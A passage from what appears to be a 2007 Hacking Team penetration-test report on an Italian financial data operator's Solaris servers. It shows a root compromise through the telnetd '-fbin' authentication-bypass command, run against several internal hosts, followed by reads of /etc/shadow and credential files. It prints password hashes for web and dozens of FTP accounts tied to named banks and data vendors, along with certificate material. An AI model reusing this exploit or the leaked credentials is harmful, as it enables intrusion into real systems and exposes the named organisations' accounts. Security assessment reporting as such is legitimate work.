The result was a root compromise of the master machine (application server) and it's contained Solaris zones:
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
Sourcing //.profile-EIS.....
root@mtsfesrv01 # ifconfig -a | grep inet
inet 127.0.0.1 netmask ff000000
inet 127.0.0.1 netmask ff000000
inet 127.0.0.1 netmask ff000000
inet 127.0.0.1 netmask ff000000
inet 127.0.0.1 netmask ff000000
inet 127.0.0.1 netmask ff000000
inet 127.0.0.1 netmask ff000000
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 41 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
inet 192.168.253.235 netmask ffffff00
inet 192.168.253.240 netmask ffffff00
inet 192.168.253.241 netmask ffffff00
inet 192.168.253.10 netmask ffffff00 broadcast 192.168.253.255
inet 0.0.0.0 netmask 0
inet 192.168.253.138 netmask ffffff00 broadcast 192.168.253.255
inet 192.168.253.162 netmask ffffff00 broadcast 192.168.253.255
inet 192.168.253.160 netmask ffffff00 broadcast 192.168.253.255
inet 192.168.253.170 netmask ffffff00 broadcast 192.168.253.255
inet 0.0.0.0 netmask 0
inet 192.168.253.207 netmask ffffff00 broadcast 192.168.253.255
inet 0.0.0.0 netmask 0
inet 192.168.253.164 netmask ffffff00 broadcast 192.168.253.255
root@mtsfesrv01 # cat /etc/release
Solaris 10 6/06 s10s_u2wos_09a SPARC
Copyright 2006 Sun Microsystems, Inc. All Rights Reserved.
Use is subject to license terms.
Assembled 09 June 2006
root@mtsfesrv01 # cat /etc/passwd
root:x:0:0:Super-User:/:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
smmsp:x:25:25:SendMail Message Submission Program:/:
listen:x:37:4:Network Admin:/usr/net/nls:
gdm:x:50:50:GDM Reserved UID:/:
webservd:x:80:80:WebServer Reserved UID:/:
nobody:x:60001:60001:NFS Anonymous Access User:/:
noaccess:x:60002:60002:No Access User:/:
nobody4:x:65534:65534:SunOS 4.x NFS Anonymous Access User:/:
webadmin:x:100:100::/home/webadmin:/bin/sh
ftpd:x:101:101::/home/ftpd:/bin/sh
luca:x:102:1::/home/luca:/bin/sh
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 42 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
root@mtsfesrv01 # cat /etc/shadow
root:$2a$04$dAVO53ZfWUoUnpFhdMo1B.yQA8VxVTCWiZLTpMKIkTj1DqjuoVE1q:13387::::::
daemon:NP:6445::::::
bin:NP:6445::::::
sys:NP:6445::::::
adm:NP:6445::::::
lp:NP:6445::::::
uucp:NP:6445::::::
nuucp:NP:6445::::::
smmsp:NP:6445::::::
listen:*LK*:::::::
gdm:*LK*:::::::
webservd:*LK*:::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
webadmin:*LK*:::::::
ftpd:*LK*:::::::
luca:$2a$04$LfZqcLGCM8E/mOs1G0dds.U/l.NLNt32YInf/p442IwBgILwxPBnG:13468::::::
root@mtsfesrv01 # id
uid=0(root) gid=0(root)
Some of the Solaris instances deployed as zones were also vulnerable to the telnetd authentication bypass
vulnerability:
# telnet -l"-fbin" 192.168.253.160
Trying 192.168.253.160...
Connected to 192.168.253.160.
Escape character is '^]'.
.--------.| |_.-----.--| |.' _|.-----.-----.--| |.--.--.--.-----.|_ |
| || _|__ --| _ || _|| -__| -__| _ || | | |__ --| _| |_
|__|__|__||____|_____|_____||__| |_____|_____|_____||________|_____||______|
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
bash-3.00$ ls -la
total 1038
drwxr-xr-x 19 root root 512 Aug 29 18:27 .
drwxr-xr-x 19 root root 512 Aug 29 18:27 ..
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 43 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
-rw------- 1 root root 57 Aug 29 18:27 .Xauthority
-rw------- 1 root root 8376 Sep 6 12:34 .bash_history
-rw------- 1 root root 1024 Jan 2 2007 .rnd
drwx------ 3 root root 512 Sep 29 2006 .sunw
lrwxrwxrwx 1 root root 9 Sep 29 2006 bin -> ./usr/bin
drwxr-xr-x 12 root root 1024 Nov 18 2006 dev
drwxr-xr-x 67 root sys 3584 Nov 18 2006 etc
drwxr-xr-x 3 root sys 512 Sep 29 2006 export
dr-xr-xr-x 1 root root 1 Nov 18 2006 home
drwxr-xr-x 7 root bin 5120 Aug 1 2006 lib
drwxr-xr-x 2 root sys 512 Aug 1 2006 mnt
dr-xr-xr-x 1 root root 1 Nov 18 2006 net
drwxr-xr-x 8 root sys 512 Jun 20 19:02 opt
drwxr-xr-x 22 root sys 1024 Aug 21 2006 platform
dr-xr-xr-x 247 root root 480032 Sep 7 20:49 proc
drwxr-xr-x 2 root sys 1024 Aug 1 2006 sbin
drwxr-xr-x 4 root root 512 Aug 1 2006 system
drwxrwxrwt 4 root sys 360 Sep 7 03:30 tmp
drwxr-xr-x 41 root sys 1024 Aug 21 2006 usr
drwxr-xr-x 42 root sys 1024 Sep 29 2006 var
drwxr-xr-x 11 root root 1024 Aug 22 12:22 wwwlogs
bash-3.00$ cd wwwlogs/
bash-3.00$ ls
bvportal.mtsspa.it dfeed1.mtsspa.it dfeed2.mtsspa.it lost+found
testwebserver webstats www.euromtsindex.com
bash-3.00$
bash-3.00$ ls
ARCHIVE dfeed1.mtsspa.it-access_log-20070904
dfeed1.mtsspa.it-ssl_request_log-20070901 dfeed1.mtsspa.it-ssl_request_log-
20070905
dfeed1.mtsspa.it-access_log-20070901 dfeed1.mtsspa.it-access_log-20070905
dfeed1.mtsspa.it-ssl_request_log-20070902 dfeed1.mtsspa.it-ssl_request_log-
20070906
dfeed1.mtsspa.it-access_log-20070902 dfeed1.mtsspa.it-access_log-20070906
dfeed1.mtsspa.it-ssl_request_log-20070903 dfeed1.mtsspa.it-ssl_request_log-
20070907
dfeed1.mtsspa.it-access_log-20070903 dfeed1.mtsspa.it-access_log-20070907
dfeed1.mtsspa.it-ssl_request_log-20070904
bash-3.00$ tail dfeed1.mtsspa.it-access_log-20070901
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 44 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
213.92.81.231 - - [01/Sep/2007:23:10:30 +0200] "GET /dfeed/loginPage.jsp
HTTP/1.0" 503 323 "-" "check_http/1.81 (nagios-plugins 1.4)"
213.92.81.231 - - [01/Sep/2007:23:15:30 +0200] "GET /dfeed/loginPage.jsp
HTTP/1.0" 503 323 "-" "check_http/1.81 (nagios-plugins 1.4)"
213.92.81.231 - - [01/Sep/2007:23:20:30 +0200] "GET /dfeed/loginPage.jsp
HTTP/1.0" 503 323 "-" "check_http/1.81 (nagios-plugins 1.4)"
213.92.81.231 - - [01/Sep/2007:23:25:30 +0200] "GET /dfeed/loginPage.jsp
HTTP/1.0" 503 323 "-" "check_http/1.81 (nagios-plugins 1.4)"
213.92.81.231 - - [01/Sep/2007:23:30:39 +0200] "GET /dfeed/loginPage.jsp
HTTP/1.0" 503 323 "-" "check_http/1.81 (nagios-plugins 1.4)"
213.92.81.231 - - [01/Sep/2007:23:35:39 +0200] "GET /dfeed/loginPage.jsp
HTTP/1.0" 503 323 "-" "check_http/1.81 (nagios-plugins 1.4)"
213.92.81.231 - - [01/Sep/2007:23:40:39 +0200] "GET /dfeed/loginPage.jsp
HTTP/1.0" 503 323 "-" "check_http/1.81 (nagios-plugins 1.4)"
213.92.81.231 - - [01/Sep/2007:23:45:39 +0200] "GET /dfeed/loginPage.jsp
HTTP/1.0" 503 323 "-" "check_http/1.81 (nagios-plugins 1.4)"
213.92.81.231 - - [01/Sep/2007:23:50:39 +0200] "GET /dfeed/loginPage.jsp
HTTP/1.0" 503 323 "-" "check_http/1.81 (nagios-plugins 1.4)"
213.92.81.231 - - [01/Sep/2007:23:55:39 +0200] "GET /dfeed/loginPage.jsp
HTTP/1.0" 503 323 "-" "check_http/1.81 (nagios-plugins 1.4)"
<Directory /var/www/dfeed1/download/MTSP/>
Options Indexes FollowSymLinks MultiViews
IndexOptions HTMLTable FancyIndexing NameWidth=* SuppressDescription
AllowOverride None
AuthType Basic
AuthName "Domestic Download"
AuthUserFile /export/home/webadmin/passwd
Require user fileadmin MTSPDOM
#Order Deny,Allow
#Deny from all
#Allow from 62.235.84.*, 213.92.81.*
</Directory>
<Directory /var/www/dfeed1/download/MTSG/>
Options Indexes FollowSymLinks MultiViews
IndexOptions HTMLTable FancyIndexing NameWidth=* SuppressDescription
AllowOverride None
AuthType Basic
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 45 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
AuthName "Domestic Download"
AuthUserFile /export/home/webadmin/passwd
Require user fileadmin MTSGDOM
#Order Deny,Allow
#Deny from all
#Allow from 62.235.84.*, 213.92.81.*
</Directory>
$ telnet -l"-fbin" 192.168.253.162
Trying 192.168.253.162...
Connected to 192.168.253.162.
Escape character is '^]'.
Last login: Fri Sep 7 21:04:12 from 100.100.200.87
__ __ ___ __ ______
.--------.| |_.-----.--| |.' _|.-----.-----.--| |.--.--.--.-----.|__ |
| || _|__ --| _ || _|| -__| -__| _ || | | |__ --|| __|
|__|__|__||____|_____|_____||__| |_____|_____|_____||________|_____||______|
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
$
$ telnet -l"-fbin" 192.168.253.170
Trying 192.168.253.170...
Connected to 192.168.253.170.
Escape character is '^]'.
__ __ __ ____
.--------.| |_.-----.--.--.---.-.--| |.--| |.-----.---.-.-----.|_ |
| || _|__ --| | | _ | _ || _ ||__ --| _ |__ --| _| |_
|__|__|__||____|_____|\___/|___._|_____||_____||_____|___._|_____||______|
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
$
bash-3.00$ uname -a
SunOS mtsvaddsws1 5.10 Generic_118833-17 sun4v sparc SUNW,Sun-Fire-T200
It was possible to read various configuration files containig database and application level username and
passwords:
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 46 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
bash-3.00$ cat /export/home/webadmin/passwd
fileadmin:vxR9a8cJ2nEIw
MTSADOM:D7iIJ3ojSms92
MTSAMDOM:C/ovsId9p4apc
MTSEDOM:CuA0L0DfxDeqY
MTSFDOM:kz/5pkUL.nxsI
MTSPDOM:z7G3ngzvnFPBA
MTSGDOM:AjToSSJQqi3yk
The data feed application was found to reside on this application server and must therefore be considered as
compromised:
bash-3.00$ pwd
/var/www/dfeed1/download
bash-3.00$ ls
MTSA MTSAM MTSE MTSF MTSG MTSP
bash-3.00$ ls -laR | wc -l
6007
bash-3.00$ cd /var/www/dfeed3/
bash-3.00$ ls
favicon.ico images index.html
index.html.good index.maintenance.html
bash-3.00$ ls -la
total 24
drwxr-xr-x 3 webadmin webadmin 512 Nov 10 2006 .
drwxr-xr-x 3 root root 512 Nov 10 2006 ..
-rw-r--r-- 1 webadmin webadmin 1470 Nov 10 2006 favicon.ico
drwxr-xr-x 2 webadmin webadmin 512 Nov 10 2006 images
-rw-r--r-- 1 webadmin webadmin 1810 Jan 10 2007 index.html
-rw-r--r-- 1 webadmin webadmin 2008 Nov 10 2006 index.html.good
-rw-r--r-- 1 webadmin webadmin 2454 Nov 10 2006 index.maintenance.html
bash-3.00$ uname -a
SunOS mtsdfeedws3 5.10 Generic_118833-17 sun4v sparc SUNW,Sun-Fire-T200
The bvportal, dfeed1, dfeed2 and euromtsindex applications have been discovered on this application server
and therefore they should be considered compromised as well:
bash-3.00# cd /wwwdocs/
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 47 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
bash-3.00# ls
cgi-bin htdocs lists
bash-3.00# ls -la
total 82
drwxr-xr-x 7 idxadmin bondindex 9216 Sep 7 16:40 .
drwxr-xr-x 22 root root 512 Jan 22 2007 ..
dr-xr-xr-x 2 idxadmin bondindex 80 Dec 22 2006 .etc
-rw------- 1 idxadmin bondindex 3692 Aug 1 18:42 .sh_history
drwxr-xr-x 2 idxadmin bondindex 80 Jan 2 2007 cgi-bin
drwxrwxr-x 14 idxadmin bondindex 2048 Sep 7 16:40 htdocs
drwxr-xr-x 8 idxadmin bondindex 1024 Jan 12 2007 lists
bash-3.00# ls -la
total 258
drwxr-xr-x 11 root root 1024 Aug 22 12:22 .
drwxr-xr-x 22 root root 512 Jan 22 2007 ..
dr-xr-xr-x 2 root other 80 Dec 22 2006 .etc
drwxr-xr-x 4 root root 7168 Sep 8 00:02 bvportal.mtsspa.it
drwxr-xr-x 3 root root 26624 Sep 8 00:00 dfeed1.mtsspa.it
drwxr-xr-x 3 root root 18432 Sep 8 00:00 dfeed2.mtsspa.it
drwxr-xr-x 2 root root 8192 Dec 22 2006 lost+found
drwxr-xr-x 2 root root 1024 Sep 6 12:45 testwebserver
drwxrwxr-x 3 root 600 6144 Sep 6 13:40 webstats
drwxr-xr-x 4 root root 26624 Sep 8 00:00 www.euromtsindex.com
Several directories were mounted over NFS:
/zones/indexws1/root/wwwdocs on 192.168.253.70:/idxdocs remote/read
only/setuid/nodevices/vers=3/xattr/zone=indexws1/dev=4e00024 on Tue Jan 9 17:23:30 2007
/zones/indexws1/root/wwwlogs on 192.168.253.70:/wwwlogs
remote/read/write/setuid/nodevices/vers=3/xattr/zone=indexws1/dev=4e00025 on Tue Jan 9 17:23:30
2007
/zones/indexws1/root/idxdata on 192.168.253.70:/idxdata remote/read
only/setuid/nodevices/vers=3/xattr/zone=indexws1/dev=4e00026 on Tue Jan 9 17:23:30 2007
/zones/ftp1/root/ftpdata on 192.168.253.70:/ftpdata
remote/read/write/setuid/nodevices/vers=3/xattr/zone=ftp1/dev=4e0002a on Fri Jan 12 21:10:23 2007
/zones/ftp1/root/ftplogs on 192.168.253.70:/ftplogs
remote/read/write/setuid/nodevices/vers=3/xattr/zone=ftp1/dev=4e0002e on Fri Jan 12 21:18:02 2007
/zones/ftptest1/root/ftpdata on 192.168.253.70:/ftpdata-test
remote/read/write/setuid/nodevices/xattr/zone=ftptest1/dev=4e00030 on Thu May 10 18:56:57 2007
/zones/ftptest1/root/ftplogs on 192.168.253.70:/ftplogs-test
remote/read/write/setuid/nodevices/xattr/zone=ftptest1/dev=4e00031 on Thu May 10 19:00:04 2007
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 48 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
/zones/dfeedws1/root/wwwlogs on 192.168.253.70:/wwwlogs
remote/read/write/setuid/nodevices/vers=3/xattr/zone=dfeedws1/dev=4e00032 on Wed Aug 29 18:49:43
2007
bash-3.00# cd idxdata/
bash-3.00# ls -la
total 626
drwxr-xr-x 8 idxadmin bondindex 1024 Jan 4 2007 .
drwxr-xr-x 22 root root 512 Jan 22 2007 ..
dr-xr-xr-x 2 root other 80 Dec 22 2006 .etc
drwxr-xr-x 2 idxadmin bondindex 271360 Jan 12 2007 FTPFILES
drwxrwxrwx 2 idxadmin bondindex 8192 Jan 4 2007 GRAPHS
drwxr-xr-x 2 idxadmin bondindex 1024 Jan 4 2007 HTMLFILES
drwxr-xr-x 2 root root 8192 Dec 22 2006 lost+found
bash-3.00# ls -la
total 818
drwxr-xr-x 22 root root 1024 Mar 2 2007 .
drwxr-xr-x 20 root root 512 Sep 5 11:28 ..
dr-xr-xr-x 2 root other 80 Dec 22 2006 .etc
drwxr-xr-x 4 root other 80 May 24 2006 backup
drwxr-xr-x 2 500 60000 1024 Mar 2 2007 capitalia
drwxr-xr-x 2 172 60000 37888 Sep 7 19:47 ecb
drwxr-xr-x 5 500 60000 1024 Apr 19 18:14 ftp
drwxr-xr-x 3 107 60000 45056 Mar 1 2007 ftp1.tobedeleted
drwxr-xr-x 3 161 60000 80 Sep 4 2006 ftp10
drwxr-xr-x 2 113 60000 1024 Feb 6 2007 ftp2.tobedeleted
drwxr-xr-x 5 121 60000 1024 Sep 7 20:30 ftp3
drwxr-xr-x 2 123 60000 80 Jan 14 2005 ftp4
drwxr-xr-x 3 131 60000 108544 Sep 7 18:50 ftp5
drwxr-xr-x 2 139 60000 80 Dec 19 2006 ftp6
drwxr-xr-x 2 140 60000 77824 Sep 7 18:45 ftp7
drwxr-xr-x 2 146 60000 1024 Mar 21 2006 ftp8
drwxr-xr-x 2 153 60000 80 Dec 18 2006 ftp9
drwxr-xr-x 4 158 60000 1024 Oct 19 2006 ftptest
drwxr-xr-x 2 122 60000 80 Jan 12 2005 inet
drwxr-xr-x 3 500 60000 62464 Sep 7 16:15 refprices
drwxr-x--- 5 root ftpd 1024 Dec 19 2006 root
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 49 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
It was possible to read various configuration files containing ftp usernames and passwords:
bash-3.00# find ./ | grep passwd
./root/auth/passwd.ftp
./root/auth/passwd.ftps
bash-3.00# cat root/auth/passwd.ftp
comstock:$1$vIQI1M7j$HPeC9rbj5zxqVAyif3Qo20:102:102::/ftpdata/ftp:/bin/ftpfalse
euronext:$1$UKuWwfuu$y22QltUC8DEwZNNc8RaqO0:103:103::/ftpdata/ftp:/bin/sh
socgen:$1$lBP1Ldwp$O6qLbEM/d./apEDaOTvYk/:105:105::/ftpdata/ftp:/bin/ftpfalse
cdcixis:$1$ptRGlgbU$MOL9E81hIHBr.P5wK3mfU.:106:106::/ftpdata/ftp:/bin/ftpfalse
reuters:$1$MyGHEg3Z$C39bi1szIh3.x1DBVxNAi1:108:108::/ftpdata/refprices:/bin/ftpfalse
comstockp:$1$k3nxhWwK$P4XVzXqMdPLWWVCVz2KmS.:109:109::/ftpdata/refprices:/bin/ftpfalse
telekurs:$1$Tr4jxDVz$mD2Okw.EfRPs8Ke4glhr41:110:110::/ftpdata/ftp:/bin/ftpfalse
Thomson:$1$2j1tJOYW$64s6EXDhJnONVJ1UpznY5/:111:111::/ftpdata/ftp:/bin/ftpfalse
Fininfo:$1$r2CsvFS6$Bv92qujJGISlwDU8fQebI0:112:112::/ftpdata/ftp:/bin/ftpfalse
capitalia:$1$gNCKMOJi$7ZvxSeibZ3l1t8CJfAybR.:114:114::/ftpdata/capitalia:/bin/ftpfalse
reutersp:$1$clj6IVR2$3z2wvaapE9eA8m8syQCHJ.:115:115::/ftpdata/ftp:/bin/ftpfalse
jetmultidaily:$1$pxpSxdsk$ZnNHg80NbAZ6uJ1UaNVWC0:116:116::/ftpdata/ftp/DAILY:/bin/ftpfalse
jetmultimonthly:$1$ltYx7UDZ$dnvfhdOIux0/avMmadq49.:117:117::/ftpdata/ftp/MONTHLY:/bin/ftpfalse
Natexis:$1$9XASFBSm$ozJYsr8IsPVY6SF68FNuO/:118:118::/ftpdata/ftp:/bin/ftpfalse
russellmemonthly:$1$yKLXqq1C$oGptfYyMtYjqTfEsxrtUo1:119:119::/ftpdata/ftp/MONTHLY:/bin/ftpfalse
russellmedaily:$1$2yVxc39E$hAlCxcwfkZx7aVhXoql1N1:120:120::/ftpdata/ftp/DAILY:/bin/ftpfalse
mtsceto:$1$TSSMLNAh$3fH3CZrLs2j/.gVv29Wim0:121:121::/ftpdata/ftp3:/bin/ftpfalse
inetradware:$1$eWCfW8YK$dngo4/8FuClaockGb/kL40:122:122::/ftpdata/inet:/bin/ftpfalse
kestrel:$1$CQN5lS6X$3a2ozfN4ErsGPOTIluNMo.:123:123::/ftpdata/ftp4:/bin/ftpfalse
CSAMmonthly:$1$9dAph3EN$QbGR0ZWBwNNCiVLbWq82l/:124:124::/ftpdata/ftp/MONTHLY:/bin/ftpfalse
lagefidaily:$1$536RLBe4$jc4jsPP3UHZtE0mcDc/wB.:125:125::/ftpdata/ftp/DAILY:/bin/ftpfalse
mtsmonitoring:$1$J3dgXIMb$/ZR4vwP9H4QGiJqI776VT.:126:126::/ftpdata/inet:/bin/ftpfalse
fourcast:$1$j9ExYCds$DjUMmqTJLsVSwmwPM3PyU/:127:127::/ftpdata/ftp/DAILY:/bin/ftpfalse
fourrefcast:$1$foBusAcY$2hz5QWZY3UhED6N7n6z0N/:128:128::/ftpdata/refprices:/bin/ftpfalse
EcoWinABDaily:$1$CteCW84A$0hr1RP/muxcxAJfyCxYKa/:129:129::/ftpdata/ftp/DAILY:/bin/ftpfalse
EcoWinABMonthly:$1$MMfquMcg$Y8mFZJ3CQ35VscojGHOP/.:130:130::/ftpdata/ftp/MONTHLY:/bin/ftpfalse
mtsforcast:$1$fuf1UgP4$1vP3lHFmFPDLt.7GISM3T.:131:131::/ftpdata/ftp5:/bin/bash
csdataforcast:$1$M7D7CbXZ$VDPynTRSXJ/wT3aIm0Vpi/:132:132::/ftpdata/ftp5:/bin/ftpfalse
finmerc:$1$LOCQry61$Fb3Fpyv1Udp/JerFCrI6R.:133:133::/ftpdata/ftp/DAILY:/bin/ftpfalse
calyondaily:$1$HFYswGZz$FWIEpX4RteLafGaAIbIOf.:134:134::/ftpdata/ftp/DAILY:/bin/ftpfalse
calyonmonthly:$1$znApaLpj$mvJBfKuHngsl/UzEa1I7a.:135:135::/ftpdata/ftp/MONTHLY:/bin/ftpfalse
ccompensazione:$1$Kn6H2Hyw$fJ8zzrm.AFr2oYjWLH8pt0:138:138::/ftpdata/ftp6:/bin/ftpfalse
mtsccg:$1$up89rKet$To1nLIlmmxa3Ilkm5sh4R/:139:139::/ftpdata/ftp6:/bin/bash
mtsconsob:$1$21GSwOeO$D8E.rGv4td0Bm0PVsg1I81:140:140::/ftpdata/ftp7:/bin/ftpfalse
consob:$1$bCwVc9VM$WRuFvu/wC3sD5IXQDsAYB/:141:141::/ftpdata/ftp7:/bin/ftpfalse
ixiscibdaily:$1$Z7hxn6zN$324bZYztps/hBziHvjlfE1:142:142::/ftpdata/ftp/DAILY:/bin/ftpfalse
ixiscibmonthly:$1$MUMesoGH$3AUZrRt42oivzo2jFG/Rm0:143:143::/ftpdata/ftp/MONTHLY:/bin/ftpfalse
imibankdaily:$1$92EtOnsE$tke.Sr1UibIt3puimnXNq0:144:144::/ftpdata/ftp/DAILY:/bin/ftpfalse
imibankmonthly:$1$cjsT9sqZ$LsLqLpTfa8NAym8cX1GKQ/:145:145::/ftpdata/ftp/MONTHLY:/bin/ftpfalse
mtsbvision:$1$1Gj08q8z$i3E7qmbSk1KxravjvaI/0.:146:146::/ftpdata/ftp8:/bin/ftpfalse
itsoftdaily:$1$PFy2uFCk$ssFzrujr.LmIFGoV73hyp1:147:147::/ftpdata/ftp8:/bin/ftpfalse
Natexisdaily:$1$2vBm0gaB$jxOB669v5TvRq1cAzMou4.:148:148::/ftpdata/ftp/DAILY:/bin/ftpfalse
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 50 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
NatexisMonthly:$1$5tX4Wxm2$gqeWBX2HmrFuG26WZ406..:149:149::/ftpdata/ftp/MONTHLY:/bin/ftpfalse
BankIMIdaily:$1$Xkkc1TBP$Vd1m0N8HdrAAvBHyoVZOB0:150:150::/ftpdata/ftp/DAILY:/bin/ftpfalse
BankIMImonthly:$1$YeeBgZMk$OYov8ahYgBWZjTptte7TH0:151:151::/ftpdata/ftp/MONTHLY:/bin/ftpfalse
Sanjit:$1$NoQGu7HW$y7mgChwUn6qoBZjp9zzun.:152:152::/ftpdata/ftp:/bin/ftpfalse
ftpstats:$1$DD5T9X4i$SNX5wdei/PCfC7Iv3SUNM0:153:153::/ftpdata/ftp9:/bin/ftpfalse
riskmetricsdaily:$1$7anaOGQa$qJnX770Teeg12Ka2wYEmr/:154:154::/ftpdata/ftp/DAILY:/bin/ftpfalse
riskmetricsmonthly:$1$WoCON4Ub$QYNdtB./CzbGyj8fikRhS1:155:155::/ftpdata/ftp/MONTHLY:/bin/ftpfals
Morningstardaily:$1$dlOgTEuu$cvuXdlL9LcgQNGS/JR3R..:156:156::/ftpdata/ftp/DAILY:/bin/ftpfalse
oli4ftp:$1$8vbzBlPf$r2xkFJ1ddm.CYZjNAbnLx.:157:157::/ftpdata/ftp:/bin/false
mtstest:$1$ghzRzw4n$rFHGSp4SE./izeD1H4yLw.:158:158::/ftpdata/ftptest:/bin/bash
testservice:$1$5NEU42tt$Gty3TzSStXNqsddKnK9ox.:159:159::/ftpdata/ftptest:/bin/false
mtscmf:$1$GCwkZiFT$nglu8I/j/qLh7ZJ.M/DW2/:161:161::/ftpdata/ftp10:/bin/false
MTSInternet:$1$rHGuxVpK$BNPsb1yIL/Ttnw3uJe72T0:162:162::/ftpdata/ftp10:/bin/false
FactsetDaily:$1$9RBsIaUp$rt7Ai6Y.QbuGhLM5kSaPK/:163:163::/ftpdata/ftp/DAILY:/bin/ftpfalse
FactsetMonthly:$1$z6KMVU3I$ecEcDKDLk8H3g16xj9bwa1:164:164::/ftpdata/ftp/MONTHLY:/bin/ftpfalse
SusqueMonthly:$1$iQ6A7UAq$aa/mO4OUn214CYdHMwYC5/:165:165::/ftpdata/ftp/MONTHLY:/bin/ftpfalse
SusqueDaily:$1$CkyR72js$/XTOLAK6id/QKENNT.P02/:166:166::/ftpdata/ftp/DAILY:/bin/ftpfalse
morganstdaily:$1$jLQV2wvI$vDBluNDho1VCO7SSe6sk80:167:167::/ftpdata/ftp/DAILY:/bin/ftpfalse
morganstmonthly:$1$2kwrAROG$q.TrikbkoNtTFb7B8ZaOr/:168:168::/ftpdata/ftp/MONTHLY:/bin/ftpfalse
IFSrealtime:$1$DFEAWpK6$esmougjbeCbOh48GwtQKA0:169:169::/ftpdata/ftp/REALTIME:/bin/ftpfalse
coveafinmonthly:$1$zD4NKFEo$DvE3fIzr6LXa2tfzF198n0:170:170::/ftpdata/ftp/MONTHLY:/bin/ftpfalse
coveafindaily:$1$jXHkxEI0$wsgpILxLyFHbKh2Mfhs2R0:171:171::/ftpdata/ftp/DAILY:/bin/ftpfalse
mtsecb:$1$lOgiJCf1$CNoUBsqFjGrkADK.dYrP9/:172:172::/ftpdata/ecb:/bin/ftpfalse
ecb:$1$BKdQZTZN$GDeyNeii9GsZGGvt6RcgK/:173:173::/ftpdata/ecb:/bin/ftpfalse
AGFdatadaily:$1$gZp0oXPK$ErmRMTKwKxNZcIR5WUEZo.:174:174::/ftpdata/ftp/DAILY:/bin/ftpfalse
bundesbank:$1$rqpjHS42$3EJu8Q4Xw2gW916x10s/B1:175:175::/ftpdata/ecb:/bin/ftpfalse
mtsrefp:$1$XzvfOI0b$sG0M46SDo18lERU5If5nH1:500:107::/ftpdata/refprices:/bin/bash
mtscap:$1$kS7eY5K8$lDpyqGxH31k.Dz82DDvSQ0:500:113::/ftpdata/capitalia:/bin/bash
mts:$1$fP5rQ0Cs$fYbfp/N70hpwhArwJUWFU/:500:101::/ftpdata/ftp:/bin/bash
bash-3.00# cat root/auth/passwd.ftps
mtsconsob:$1$21GSwOeO$D8E.rGv4td0Bm0PVsg1I81:140:140::/ftpdata/ftp7:/bin/ftpfalse
consob:$1$bCwVc9VM$WRuFvu/wC3sD5IXQDsAYB/:141:141::/ftpdata/ftp7:/bin/ftpfalse
nagios:$1$liqcAJDt$bCouTjnzcmGOJmGNcfeiz/:141:141::/ftpdata/ftp7:/bin/ftpfalse
It was possible to read public and private ftps keys:
bash-3.00# cat root/certs/ftps.
ftps.crt ftps.csr ftps.key ftps.pem
bash-3.00# cat root/certs/ftps.*
-----BEGIN CERTIFICATE-----
MIICkzCCAfwCCQCfjPdZFsqk9jANBgkqhkiG9w0BAQQFADCBjTELMAkGA1UEBhMC
SVQxDjAMBgNVBAgTBUl0YWx5MQ4wDAYDVQQHEwVNaWxhbjESMBAGA1UEChMJTVRT
IEdyb3VwMQswCQYDVQQLEwJJVDEXMBUGA1UEAxMOZnRwcy5tdHNzcGEuaXQxJDAi
BgkqhkiG9w0BCQEWFXRlY2hvcHNfbWlsQG10c3NwYS5pdDAeFw0wNTA2MTAxMDQ5
MzdaFw0xNTA2MDgxMDQ5MzdaMIGNMQswCQYDVQQGEwJJVDEOMAwGA1UECBMFSXRh
